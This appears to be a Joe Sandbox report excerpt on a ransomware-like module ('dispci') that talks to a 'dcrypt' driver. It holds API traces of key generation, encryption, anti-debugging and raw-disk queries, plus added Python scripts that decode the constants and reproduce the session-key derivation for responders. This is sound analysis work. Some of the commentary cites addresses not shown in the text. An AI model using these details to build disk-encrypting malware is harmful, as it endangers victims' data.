                                              • CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00A81040
                                              • LocalAlloc.KERNEL32(00000040,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00A81054
                                              • CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?), ref: 00A81066
                                              • LocalFree.KERNEL32(00000000,?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004), ref: 00A81069
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                               • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: CryptParam$Local$AllocFree
                                              • String ID:
                                              • API String ID: 3966954206-0
                                              • Opcode ID: e2a01674213e9624bd2bbab80bf897aba5581caadc0aa28beb2fca20fb9529de
                                              • Instruction ID: 94eee96f8688b2062f44f23d9bab4f50cb653d136f6d100610583fa754147073
                                              • Opcode Fuzzy Hash: e2a01674213e9624bd2bbab80bf897aba5581caadc0aa28beb2fca20fb9529de
                                              • Instruction Fuzzy Hash: EB014F71B41218BAEB20EB959C86FEEBB7CDF05B50F500196FA04A61D0DBB09F4187B5
                                              APIs
                                              • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000000), ref: 00A81197
                                              • LocalAlloc.KERNEL32(00000040,000000F0), ref: 00A811A3
                                              • _memmove.LIBCMT ref: 00A811BE
                                              • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,000000F0), ref: 00A811DC
                                              • LocalFree.KERNEL32(?,?,000000F0), ref: 00A811F9
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                               • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: CryptEncryptLocal$AllocFree_memmove
                                              • String ID:
                                              • API String ID: 3579331289-0
                                              • Opcode ID: 154705dc0584fe883c4da3b3fee9eb92d1e330ad042f88729ec00caba48a7b47
                                              • Instruction ID: afe8eee65c4b608611d73e8065ca7e44c8b9fc813e3afdee723b68afc0679741
                                              • Opcode Fuzzy Hash: 154705dc0584fe883c4da3b3fee9eb92d1e330ad042f88729ec00caba48a7b47
                                              • Instruction Fuzzy Hash: B0216276741225ABDB20DF99DC45FABB7ACEB86761F100256FD08D7340EA719D0187E0
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 00A8681A
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A8682F
                                              • UnhandledExceptionFilter.KERNEL32(00A93688), ref: 00A8683A
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00A86856
                                              • TerminateProcess.KERNEL32(00000000), ref: 00A8685D
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                               • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                              • String ID:
                                              • API String ID: 2579439406-0
                                              • Opcode ID: 02307287b8a9912cd2d999c6a56859be103c73118ca5269e33d60d28c759e553
                                              • Instruction ID: f538e60e0486fd88b37ec98fe14a0e864c46bc5d2cc0f5be37abd620975d1a04
                                              • Opcode Fuzzy Hash: 02307287b8a9912cd2d999c6a56859be103c73118ca5269e33d60d28c759e553
                                              • Instruction Fuzzy Hash: D321C475612204ABDB15DFADEC8569A3BB4BB48310F10801FE90886270EF755A82CF55
                                              APIs
                                              • CryptBinaryToStringW.CRYPT32(?,?,00000001,00000000,?), ref: 00A81236
                                              • LocalAlloc.KERNEL32(00000040,?,?,?,00000001,00000000,?), ref: 00A81249
                                              • CryptBinaryToStringW.CRYPT32(?,?,00000001,00000000,?), ref: 00A8125E
                                              • LocalFree.KERNEL32(00000000,?,?,00000001,00000000,?,?,?,?,00000001,00000000,?), ref: 00A81276
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                               • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: BinaryCryptLocalString$AllocFree
                                              • String ID:
                                              • API String ID: 4291131564-0
                                              • Opcode ID: 8aeed79f13f6ed67fdefae3cf907281f1428b337bfdf9f9455c2b59db54eb118
                                              • Instruction ID: 08a1f0f3659c5c302b55a9f6b11ae83aa1f5c159028bdc2fce5ecd260de499a2
                                              • Opcode Fuzzy Hash: 8aeed79f13f6ed67fdefae3cf907281f1428b337bfdf9f9455c2b59db54eb118
                                              • Instruction Fuzzy Hash: 95014477701118B7CB20DB9AAC45DEBB7ADDBC5761B1001ABFD08D7210EA718E1296E0
                                              APIs
                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00A81D8D
                                              • CryptHashData.ADVAPI32(?,?,00000021,00000000), ref: 00A81DA2
                                              • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?), ref: 00A81DBC
                                              • CryptDestroyHash.ADVAPI32(?), ref: 00A81DC8
                                                • Part of subcall function 00A81000: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 00A8101F
                                                • Part of subcall function 00A81000: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000,?,00000004,?,00000000), ref: 00A8102D
                                                • Part of subcall function 00A81000: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00A81040
                                                • Part of subcall function 00A81000: LocalAlloc.KERNEL32(00000040,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00A81054
                                                • Part of subcall function 00A81000: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?), ref: 00A81066
                                                • Part of subcall function 00A81000: LocalFree.KERNEL32(00000000,?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004), ref: 00A81069
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                               • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Crypt$Param$Hash$Local$AllocCreateDataDeriveDestroyFree
                                              • String ID:
                                              • API String ID: 797921460-0
                                              • Opcode ID: 8705d2888c6c3de6377ec8ae2cc60855e41585fd9ce5f0c5f75727f89c6648fc
                                              • Instruction ID: 918f2f8784d6b10b6aa2d12eb3cc3add7127503bb620a046458162a461a7ed0f
                                              • Opcode Fuzzy Hash: 8705d2888c6c3de6377ec8ae2cc60855e41585fd9ce5f0c5f75727f89c6648fc
                                              • Instruction Fuzzy Hash: D8019672700204BBD620DBD6DD49E5BF7BCFBC4751B100159F609D3140DA71AE01C7A0
                                              APIs
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00A812B7
                                              • GetLastError.KERNEL32 ref: 00A812C1
                                              • CryptGenRandom.ADVAPI32(?,00000021), ref: 00A812D5
                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A812E3
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                               • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Crypt$Context$AcquireErrorLastRandomRelease
                                              • String ID:
                                              • API String ID: 2963463078-0
                                              • Opcode ID: d2a396055bf4a8b831d2db37353f75950fe894d8bd08949744eb8c290a59d3fe
                                              • Instruction ID: 097891879c0e84eceac0053c65baf9b29b24fc684b17750ca6156838d26b4883
                                              • Opcode Fuzzy Hash: d2a396055bf4a8b831d2db37353f75950fe894d8bd08949744eb8c290a59d3fe
                                              • Instruction Fuzzy Hash: 1301D4363002846AEB34D7AA9C48F6BBBBDEB89700F20419DF549C7151E9718A03D720
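The two function listings above (CryptCreateHash / CryptHashData / CryptDeriveKey at 00A81D8D-00A81DC8, and CryptAcquireContextW / CryptGenRandom at 00A812B7-00A812E3) together describe how the dispci module builds its symmetric session key. Reading the literal arguments against the Windows SDK header wincrypt.h: provider type 0x18 is PROV_RSA_AES, flag 0xF0000000 is CRYPT_VERIFYCONTEXT (with a CRYPT_NEWKEYSET = 0x8 retry), ALG_ID 0x8003 is CALG_MD5, ALG_ID 0x660E is CALG_AES_128, the CryptDeriveKey flag 1 is CRYPT_EXPORTABLE, and the CryptSetKeyParam identifiers 4, 3 and 1 are KP_MODE, KP_PADDING and KP_IV. The hashed length (0x21 = 33 bytes) matches the CryptGenRandom length, so the derived key appears to rest on 33 bytes of CSP randomness; that link is an inference from the two lengths, not something the report states. The Python below is an added illustration, not code from the sample or from the Joe Sandbox report: it splits an ALG_ID into its class/type/sid fields and reproduces the CryptDeriveKey derivation Microsoft documents (take the first n bytes of the hash, or expand it with the 0x36/0x5C scheme when the key is longer than the digest), showing that with CALG_MD5 and CALG_AES_128 the session key is exactly MD5 of the random input. The `sample` bytes in `__main__` are constructed here.

```python
"""Reconstruct the CryptoAPI session-key setup seen in the dispci traces.

Observed sequence (from the API listings on this page):
  CryptAcquireContextW(..., 0x18 = PROV_RSA_AES, 0xF0000000 = CRYPT_VERIFYCONTEXT)
  CryptGenRandom(hProv, 0x21)                        -> 33 random bytes
  CryptCreateHash(hProv, 0x8003 = CALG_MD5, 0, 0, &hHash)
  CryptHashData(hHash, buf, 0x21, 0)
  CryptDeriveKey(hProv, 0x660E = CALG_AES_128, hHash, 1 = CRYPT_EXPORTABLE, &hKey)
  CryptSetKeyParam(hKey, KP_MODE=4 / KP_PADDING=3 / KP_IV=1, ...)

Constant names come from wincrypt.h; the derivation follows the CryptDeriveKey
algorithm documented by Microsoft. Added illustration, not code from the sample
or from the sandbox report.
"""
import hashlib
import os

# ALG_ID layout (wincrypt.h): class in bits 13-15, type in bits 9-12, sid in bits 0-8.
ALG_CLASS_MASK = 0xE000
ALG_TYPE_MASK = 0x1E00
ALG_SID_MASK = 0x01FF

# Only the ALG_IDs that appear in the traces on this page (name, hashlib name).
KNOWN_ALG_IDS = {
    0x8003: ("CALG_MD5", "md5"),
    0x660E: ("CALG_AES_128", None),
}
KEY_BYTES = {"CALG_AES_128": 16}


def decode_alg_id(alg_id: int) -> dict:
    """Split an ALG_ID into its class/type/sid fields and name it if known."""
    name, _ = KNOWN_ALG_IDS.get(alg_id, ("<unknown>", None))
    return {
        "class": alg_id & ALG_CLASS_MASK,  # 0x8000 = ALG_CLASS_HASH, 0x6000 = ALG_CLASS_DATA_ENCRYPT
        "type": alg_id & ALG_TYPE_MASK,    # 0x0000 = ALG_TYPE_ANY, 0x0600 = ALG_TYPE_BLOCK
        "sid": alg_id & ALG_SID_MASK,      # 3 = ALG_SID_MD5, 14 = ALG_SID_AES_128
        "name": name,
    }


def crypt_derive_key(hash_name: str, data: bytes, key_len: int) -> bytes:
    """Emulate CryptDeriveKey over a hash of `data`, returning key_len bytes.

    Documented behaviour: let H = hash(data). If len(H) >= key_len the key is
    H[:key_len]. Otherwise pad H with zeros to 64 bytes, XOR every byte with
    0x36 (buffer 1) and with 0x5C (buffer 2), hash each buffer, and take the
    first key_len bytes of hash(buffer1) || hash(buffer2).
    """
    digest = hashlib.new(hash_name, data).digest()
    if len(digest) >= key_len:
        return digest[:key_len]
    padded = digest.ljust(64, b"\x00")
    buf1 = bytes(b ^ 0x36 for b in padded)
    buf2 = bytes(b ^ 0x5C for b in padded)
    expanded = hashlib.new(hash_name, buf1).digest() + hashlib.new(hash_name, buf2).digest()
    if len(expanded) < key_len:
        raise ValueError("requested key is longer than CryptDeriveKey can produce")
    return expanded[:key_len]


def session_key_from_trace(random_bytes: bytes,
                           hash_alg_id: int = 0x8003,
                           key_alg_id: int = 0x660E) -> bytes:
    """Reproduce the key the traced sequence would hand to CryptEncrypt."""
    hash_name = KNOWN_ALG_IDS[hash_alg_id][1]
    key_len = KEY_BYTES[KNOWN_ALG_IDS[key_alg_id][0]]
    return crypt_derive_key(hash_name, random_bytes, key_len)


if __name__ == "__main__":
    sample = os.urandom(33)  # constructed stand-in for CryptGenRandom(hProv, 0x21)
    key = session_key_from_trace(sample)
    print(decode_alg_id(0x660E))
    print("AES-128 session key:", key.hex())
    # MD5 is 16 bytes and AES-128 needs 16, so no expansion happens: key == MD5(random33).
    assert key == hashlib.md5(sample).digest()
```

The practical consequence for a responder: the per-victim key strength is that of the 33 CSP-random bytes, and the MD5 step adds nothing recoverable; without the random input (or the private half of the RSA key whose base64 public half is listed at 00A815EB) the key cannot be reconstructed from the binary alone.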
                                              APIs
                                              • CallNextHookEx.USER32(00030072,00000000,?,?), ref: 00A8404B
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                               • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$CallControlCreateDeviceErrorFileHookLastNext
                                              • String ID:
                                              • API String ID: 508842537-0
                                              • Opcode ID: 1d85a04890fcc9350089b7ac21431c2f7de470d5f67bf78ad9be0f2b7d84c095
                                              • Instruction ID: 1d1c6198dfe2e27b8fa79ac57ff8a43ed1bcdc06ac9e80bb5a3fa6bc0ebc9e4e
                                              • Opcode Fuzzy Hash: 1d85a04890fcc9350089b7ac21431c2f7de470d5f67bf78ad9be0f2b7d84c095
                                              • Instruction Fuzzy Hash: 3511A371B002199FDB00EFA5E884AAFBBB4EB58310F11442FE90597251DA349941CBE1
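Two DeviceIoControl calls on this page are worth decoding by hand: the one at 00A83A6F, issued on a handle opened from the "\\.\PhysicalDrive%d" format string with a 0x18-byte output buffer and control code 0x00070000, and the one at 00A83D5E, issued on "\\.\dcrypt" with control code 0x00220020. IOCTL codes are built by the winioctl.h macro CTL_CODE(DeviceType, Function, Method, Access) = (DeviceType << 16) | (Access << 14) | (Function << 2) | Method, so 0x00070000 decodes to device type 7 (FILE_DEVICE_DISK), function 0, METHOD_BUFFERED, FILE_ANY_ACCESS, which is IOCTL_DISK_GET_DRIVE_GEOMETRY; its output structure DISK_GEOMETRY is 24 bytes, matching the 0x18 in the trace. 0x00220020 decodes to device type 0x22 (FILE_DEVICE_UNKNOWN), function 8, METHOD_BUFFERED, FILE_ANY_ACCESS, a private control code for the dcrypt device that the report does not name. The Python below is an added illustration, not code from the sample or from the Joe Sandbox report: it decodes any CTL_CODE value into its fields and parses a DISK_GEOMETRY buffer into a disk size, which is the information a routine that goes on to write the boot sector needs. The `SAMPLE_GEOMETRY` buffer is constructed here; treating the 0x18-byte output as DISK_GEOMETRY is an inference from the code and size, not something the report states.

```python
"""Decode the DeviceIoControl requests seen in the dispci traces.

  CreateFileW("\\\\.\\PhysicalDrive%d", 0xC0000000 = GENERIC_READ|GENERIC_WRITE, 3, 0, 3 = OPEN_EXISTING, 0, 0)
  DeviceIoControl(h, 0x00070000, NULL, 0, out, 0x18, &ret, NULL)
  CreateFileW("\\\\.\\dcrypt", ...)
  DeviceIoControl(h, 0x00220020, ...)

CTL_CODE(DeviceType, Function, Method, Access) =
    (DeviceType << 16) | (Access << 14) | (Function << 2) | Method      (winioctl.h)
Added illustration, not code from the sample or from the sandbox report.
"""
import struct

# Only the device types, methods, access bits and IOCTL names needed for this page.
FILE_DEVICE_NAMES = {0x07: "FILE_DEVICE_DISK", 0x22: "FILE_DEVICE_UNKNOWN"}
METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
                3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
KNOWN_IOCTLS = {0x00070000: "IOCTL_DISK_GET_DRIVE_GEOMETRY"}
MEDIA_TYPE_NAMES = {0: "Unknown", 11: "RemovableMedia", 12: "FixedMedia"}


def decode_ioctl(code: int) -> dict:
    """Split a control code into the four CTL_CODE fields and name it if known."""
    device_type = (code >> 16) & 0xFFFF
    access = (code >> 14) & 0x3
    function = (code >> 2) & 0xFFF
    method = code & 0x3
    return {
        "device_type": device_type,
        "device_name": FILE_DEVICE_NAMES.get(device_type, "<other/custom>"),
        "function": function,
        "vendor_defined": function >= 0x800,  # Microsoft reserves function codes 0x000-0x7FF
        "method": METHOD_NAMES[method],
        "access": ACCESS_NAMES[access],
        "name": KNOWN_IOCTLS.get(code, "<not in this table>"),
    }


# DISK_GEOMETRY: LARGE_INTEGER Cylinders; MEDIA_TYPE MediaType;
#                DWORD TracksPerCylinder, SectorsPerTrack, BytesPerSector  (24 bytes)
DISK_GEOMETRY_FMT = "<qIIII"
DISK_GEOMETRY_SIZE = struct.calcsize(DISK_GEOMETRY_FMT)  # 24 == the 0x18 output size in the trace


def parse_disk_geometry(buf: bytes) -> dict:
    """Parse the IOCTL_DISK_GET_DRIVE_GEOMETRY output and compute the addressable size."""
    if len(buf) < DISK_GEOMETRY_SIZE:
        raise ValueError(f"DISK_GEOMETRY needs {DISK_GEOMETRY_SIZE} bytes, got {len(buf)}")
    cylinders, media, tracks, sectors, bps = struct.unpack(DISK_GEOMETRY_FMT, buf[:DISK_GEOMETRY_SIZE])
    return {
        "cylinders": cylinders,
        "media_type": MEDIA_TYPE_NAMES.get(media, f"<{media}>"),
        "tracks_per_cylinder": tracks,
        "sectors_per_track": sectors,
        "bytes_per_sector": bps,
        "size_bytes": cylinders * tracks * sectors * bps,
    }


# Constructed sample: a 1024-cylinder fixed disk with 255 heads, 63 sectors, 512-byte sectors.
SAMPLE_GEOMETRY = struct.pack(DISK_GEOMETRY_FMT, 1024, 12, 255, 63, 512)

if __name__ == "__main__":
    for code in (0x00070000, 0x00220020):
        print(hex(code), decode_ioctl(code))
    print(parse_disk_geometry(SAMPLE_GEOMETRY))
```

When triaging a similar sample, run `decode_ioctl` over every DeviceIoControl control code in the trace: codes with device type FILE_DEVICE_DISK and low function numbers are documented disk queries, while codes on a custom device such as \\.\dcrypt identify the private driver interface the user-mode component depends on.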
                                              APIs
                                                • Part of subcall function 00A861C0: __lock.LIBCMT ref: 00A861CE
                                                • Part of subcall function 00A861C0: __getch_nolock.LIBCMT ref: 00A861D8
                                              • GetDesktopWindow.USER32 ref: 00A849C3
                                              • GetForegroundWindow.USER32 ref: 00A849CB
                                              • GetShellWindow.USER32 ref: 00A849D7
                                              • GetCapture.USER32 ref: 00A849E3
                                              • GetClipboardOwner.USER32 ref: 00A849EF
                                              • GetOpenClipboardWindow.USER32 ref: 00A849FB
                                              • GetCurrentProcessId.KERNEL32 ref: 00A84A07
                                              • GetCurrentThreadId.KERNEL32 ref: 00A84A13
                                              • GetTickCount.KERNEL32 ref: 00A84A1F
                                              • GetFocus.USER32 ref: 00A84A2B
                                              • GetActiveWindow.USER32 ref: 00A84A37
                                              • GetKBCodePage.USER32 ref: 00A84A43
                                              • GetCursor.USER32 ref: 00A84A4F
                                              • GetLastActivePopup.USER32(?), ref: 00A84A62
                                              • GetProcessHeap.KERNEL32 ref: 00A84A6E
                                              • GetQueueStatus.USER32(000004BF), ref: 00A84A7F
                                              • GetInputState.USER32 ref: 00A84A8B
                                              • GetMessageTime.USER32 ref: 00A84A97
                                              • GetOEMCP.KERNEL32 ref: 00A84AA3
                                              • GetCursorInfo.USER32(?), ref: 00A84ACE
                                              • GetCaretPos.USER32(?), ref: 00A84ADB
                                              • GetCurrentThread.KERNEL32 ref: 00A84AFD
                                              • GetThreadTimes.KERNEL32(00000000), ref: 00A84B04
                                              • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00A84B23
                                              • GetProcessTimes.KERNEL32(00000000), ref: 00A84B26
                                              • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00A84B32
                                              • GetProcessMemoryInfo.PSAPI(00000000), ref: 00A84B35
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A84B3F
                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00A84B49
                                              • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00A84BAD
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows__getch_nolock__lock
                                              • String ID: ($@
                                              • API String ID: 2217453591-1311469180
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00A849C3
                                              • GetForegroundWindow.USER32 ref: 00A849CB
                                              • GetShellWindow.USER32 ref: 00A849D7
                                              • GetCapture.USER32 ref: 00A849E3
                                              • GetClipboardOwner.USER32 ref: 00A849EF
                                              • GetOpenClipboardWindow.USER32 ref: 00A849FB
                                              • GetCurrentProcessId.KERNEL32 ref: 00A84A07
                                              • GetCurrentThreadId.KERNEL32 ref: 00A84A13
                                              • GetTickCount.KERNEL32 ref: 00A84A1F
                                              • GetFocus.USER32 ref: 00A84A2B
                                              • GetActiveWindow.USER32 ref: 00A84A37
                                              • GetKBCodePage.USER32 ref: 00A84A43
                                              • GetCursor.USER32 ref: 00A84A4F
                                              • GetLastActivePopup.USER32(?), ref: 00A84A62
                                              • GetProcessHeap.KERNEL32 ref: 00A84A6E
                                              • GetQueueStatus.USER32(000004BF), ref: 00A84A7F
                                              • GetInputState.USER32 ref: 00A84A8B
                                              • GetMessageTime.USER32 ref: 00A84A97
                                              • GetOEMCP.KERNEL32 ref: 00A84AA3
                                              • GetCursorInfo.USER32(?), ref: 00A84ACE
                                              • GetCaretPos.USER32(?), ref: 00A84ADB
                                              • GetCurrentThread.KERNEL32 ref: 00A84AFD
                                              • GetThreadTimes.KERNEL32(00000000), ref: 00A84B04
                                              • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00A84B23
                                              • GetProcessTimes.KERNEL32(00000000), ref: 00A84B26
                                              • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00A84B32
                                              • GetProcessMemoryInfo.PSAPI(00000000), ref: 00A84B35
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A84B3F
                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00A84B49
                                              • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00A84BAD
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Strings
                                              Similarity
                                              • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows
                                              • String ID: ($@
                                              • API String ID: 3079641271-1311469180
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00A849C3
                                              • GetForegroundWindow.USER32 ref: 00A849CB
                                              • GetShellWindow.USER32 ref: 00A849D7
                                              • GetCapture.USER32 ref: 00A849E3
                                              • GetClipboardOwner.USER32 ref: 00A849EF
                                              • GetOpenClipboardWindow.USER32 ref: 00A849FB
                                              • GetCurrentProcessId.KERNEL32 ref: 00A84A07
                                              • GetCurrentThreadId.KERNEL32 ref: 00A84A13
                                              • GetTickCount.KERNEL32 ref: 00A84A1F
                                              • GetFocus.USER32 ref: 00A84A2B
                                              • GetActiveWindow.USER32 ref: 00A84A37
                                              • GetKBCodePage.USER32 ref: 00A84A43
                                              • GetCursor.USER32 ref: 00A84A4F
                                              • GetLastActivePopup.USER32(?), ref: 00A84A62
                                              • GetProcessHeap.KERNEL32 ref: 00A84A6E
                                              • GetQueueStatus.USER32(000004BF), ref: 00A84A7F
                                              • GetInputState.USER32 ref: 00A84A8B
                                              • GetMessageTime.USER32 ref: 00A84A97
